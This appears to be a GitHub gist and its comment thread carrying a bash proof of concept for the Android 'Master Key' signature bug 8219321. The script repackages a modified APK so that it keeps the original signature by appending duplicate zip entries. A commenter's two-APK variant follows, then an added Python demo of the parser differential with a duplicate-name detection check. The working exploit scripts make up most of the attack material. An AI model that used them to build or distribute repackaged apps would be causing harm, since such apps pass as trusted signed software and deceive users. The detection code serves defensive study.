Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec

gistfile1.sh
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z "$1" ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
# 1. decode the original APK so its resources/smali can be edited
java -jar apktool.jar d "$APK" out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
# 2. rebuild the edited tree into an (unsigned) out.apk
java -jar apktool.jar b out out.apk
#apktool b out out.apk
# 3. append every file of the ORIGINAL signed APK (including META-INF/) to out.apk,
#    so each name appears twice: the rebuilt entry first, the original signed entry second
mkdir tmp
cd tmp/
unzip "../$APK"
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
# Append one file to the zip. zipfile does not refuse a name that already
# exists, so duplicate entries are created; entries are STORED (no compression).
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk "../evil-$APK"
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"

https://github.com/Fuzion24/AndroidMasterKeys/ I built a slightly more resilient tool. This also makes sure not to duplicate files that exist in the original application, as well as compressing the added files. Python's zip append in the above script will only add files as STORED (no compression).

The apktool options are here: https://code.google.com/p/android-apktool/source/browse/brut.apktool/apktool-cli/src/main/java/brut/apktool/Main.java

  • d: decompile
  • b: build

So you simply decompile, modify and rebuild and ... Android does not recompute the hash?

@BrunoVernay I'm duplicating entries inside the apk (original entries + rebuilt entries). The hashes in META-INF folder are from the original signed files, which are checked for signature, but the ones that end up being installed on the device are the duplicated ones.

Have you checked to see exactly which modified/duplicate files are getting installed & actually used? For example, try explicitly changing the AndroidManifest.xml.

Hi all, I modified the script so that it takes two different files as parameters. This scenario is more realistic if we really want to leverage an attack with this technique. However, in doing so I was not able to install the repackaged application because of the "Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]" error raised by ADB. But why does this work when the two applications are the same (I verified that it does not raise any error)? One explanation would be that, in order to verify that the application is well signed, the package manager computes a hash of every file in the APK and then verifies that the hash of this list of hashes is well signed. It is possible that the implementation handles the case where duplicated files are in the package. Thus two identical hashes would be in the list only once and thus create a valid signature. I don't know how it is implemented, but I would have done so. But to conclude, according to my experiments, this flaw cannot be leveraged by attackers to sign malicious applications with certificates of benign applications. My Cyanogen version is 7.2.0 for WildfireS (not official).

NB: please let me know if I have made a mistake

Here is the modified code:

#!/bin/bash
# Two-APK variant: rebuild $1, then append the entries of a different signed APK $2
if [ -z "$1" ] || [ -z "$2" ]; then echo "Usage: $0 <apk-to-rebuild> <signed.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d "$APK" out
echo "Modify files, when done type 'exit'"
cd out
#bash
cd ..
java -jar apktool.jar b out out.apk
mkdir tmp
cd tmp/
# second argument: the (different) signed APK whose entries get appended
APK=../$2
unzip "$APK"
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in $(find . -type f |egrep -v "(poc.py|out.apk)") ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-app.apk
cd ..
rm -rf tmp out
echo "Modified APK: evil-app.apk"

Found an open source scanner to detect this on Google Code:

http://code.google.com/p/bluebox-3xp10it-scanner/
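The script at the top of this page produces an APK whose central directory lists the same name twice (rebuilt entry first, original signed entry second), and the scanner linked above looks for exactly that condition. The following Python 3 script is an added example, not the gist's code, not the bluebox-3xp10it-scanner and not Android's own verifier. It builds such a zip from two constructed `classes.dex` payloads plus a minimal JAR-style MANIFEST.MF carrying the SHA1-Digest of the original, and then shows the parser differential this bug class relies on: a reader that keys central-directory entries by name keeps the last duplicate (whose digest matches the manifest), while a reader that stops at the first match returns the rebuilt payload. Which Android component behaved which way on affected builds is not stated on this page; the example only assumes two such readers exist. Only the manifest-digest layer of JAR verification is modelled (the .SF/.RSA signature over the manifest is omitted), and `duplicate_names` is the check a scanner, or a hardened zip reader, needs.

```python
#!/usr/bin/env python3
"""Parser differential behind Android bug 8219321, shown on a constructed zip:
two entries share the name classes.dex, the manifest digest matches only one
of them, and two plausible readers resolve the name differently."""
import base64
import hashlib
import io
import warnings
import zipfile

ENTRY = "classes.dex"
# Constructed stand-ins for a signed original and an attacker-rebuilt file.
ORIGINAL = b"dex\n035\x00 original bytecode (constructed)"
MODIFIED = b"dex\n035\x00 modified bytecode (constructed)"


def sha1_b64(content):
    return base64.b64encode(hashlib.sha1(content).digest()).decode()


def manifest_for(name, content):
    """Minimal META-INF/MANIFEST.MF: one per-entry section with the
    base64 SHA-1 of the entry's bytes, as a JAR signer records it."""
    return ("Manifest-Version: 1.0\r\n\r\n"
            f"Name: {name}\r\nSHA1-Digest: {sha1_b64(content)}\r\n\r\n").encode()


def build_apk(*versions):
    """Write a zip whose central directory lists ENTRY once per element of
    `versions`, in that order. The manifest always digests ORIGINAL, as the
    signed META-INF/ copied from the original APK would."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")  # zipfile warns on duplicate names
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr("META-INF/MANIFEST.MF", manifest_for(ENTRY, ORIGINAL))
            for content in versions:
                zf.writestr(ENTRY, content)
    return buf.getvalue()


def entries(data):
    """Central directory in on-disk order; duplicates are kept, not collapsed.
    zf.read(ZipInfo) reads each entry by its own header offset."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(info.filename, zf.read(info)) for info in zf.infolist()]


def resolve_last_wins(data, name):
    """Reader that indexes the central directory by name into a dict, so a
    later duplicate silently replaces an earlier one."""
    table = {}
    for fname, content in entries(data):
        table[fname] = content
    return table[name]


def resolve_first_match(data, name):
    """Reader that scans the central directory and stops at the first hit."""
    for fname, content in entries(data):
        if fname == name:
            return content
    raise KeyError(name)


def manifest_digest_ok(data, name, content):
    """Does `content` match the SHA1-Digest recorded for `name` in MANIFEST.MF?"""
    manifest = resolve_first_match(data, "META-INF/MANIFEST.MF").decode()
    parts = manifest.split(f"Name: {name}\r\n", 1)
    return len(parts) == 2 and f"SHA1-Digest: {sha1_b64(content)}\r\n" in parts[1]


def duplicate_names(data):
    """Scanner check: any name listed more than once in the central directory."""
    seen, dupes = set(), set()
    for fname, _ in entries(data):
        if fname in seen:
            dupes.add(fname)
        seen.add(fname)
    return sorted(dupes)


if __name__ == "__main__":
    apk = build_apk(MODIFIED, ORIGINAL)   # same order as the gist: rebuilt, then original
    last = resolve_last_wins(apk, ENTRY)
    first = resolve_first_match(apk, ENTRY)
    print("last-wins reader sees original:", last == ORIGINAL,
          "| digest ok:", manifest_digest_ok(apk, ENTRY, last))
    print("first-match reader sees modified:", first == MODIFIED,
          "| digest ok:", manifest_digest_ok(apk, ENTRY, first))
    print("duplicate names:", duplicate_names(apk))
```

A verifier that resolves names one way and an extractor that resolves them the other way is the whole bug: the digest check passes on the copy the verifier saw, and the other copy is what gets used. The only robust fix on the reading side is to refuse the archive as soon as `duplicate_names` is non-empty, rather than trying to pick the "right" duplicate.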

@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!

@poliva Thanks! :)

I tried with the script. And also, I've tried adding a duplicate classes.dex alone in the APK and installing it on the device, but was unable to install.

Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with old Android versions. Any idea what I am missing?
